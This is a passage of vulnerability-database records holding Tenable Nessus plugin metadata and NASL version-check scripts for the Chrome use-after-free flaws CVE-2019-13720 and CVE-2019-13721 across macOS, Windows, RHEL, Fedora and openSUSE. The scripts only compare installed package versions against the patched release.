Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'78.0.3904.87', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:41", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2019:3775)", "bulletinFamily": 
"scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-3775.NASL", "href": "https://www.tenable.com/plugins/nessus/130746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3775. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130746);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"RHSA\", value:\"2019:3775\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:3775)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3775\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-13720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-13721\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3775\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:41", "description": "Update chromium to 78.0.3904.87. 
Fixes CVE-2019-13720 and CVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-12T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2019-688d52f9ff)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-688D52F9FF.NASL", "href": "https://www.tenable.com/plugins/nessus/130786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-688d52f9ff.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130786);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n 
script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 31 : chromium (2019-688d52f9ff)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-688d52f9ff\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-78.0.3904.87-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:33:10", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to 78.0.3904.87 boo#1155643 :\n\n - CVE-2019-13721: Use-after-free in PDFium\n\n - CVE-2019-13720: Use-after-free in audio", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-2421)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2421.NASL", "href": "https://www.tenable.com/plugins/nessus/130501", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2421.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130501);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-2421)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to 78.0.3904.87 boo#1155643 :\n\n - CVE-2019-13721: Use-after-free in PDFium\n\n - CVE-2019-13720: Use-after-free in audio\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155643\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-78.0.3904.87-lp151.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-78.0.3904.87-lp151.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:29:34", "description": "The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. 
It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_78_0_3904_87.NASL", "href": "https://www.tenable.com/plugins/nessus/130463", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130463);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n 
script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Google Chrome < 78.0.3904.87 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03df45ca\");\n # https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?af3000b1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1019226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 78.0.3904.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'78.0.3904.87', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:52", "description": "The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. 
It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-03-26T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Use-After-Free ", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-03-26T00:00:00", "cpe": 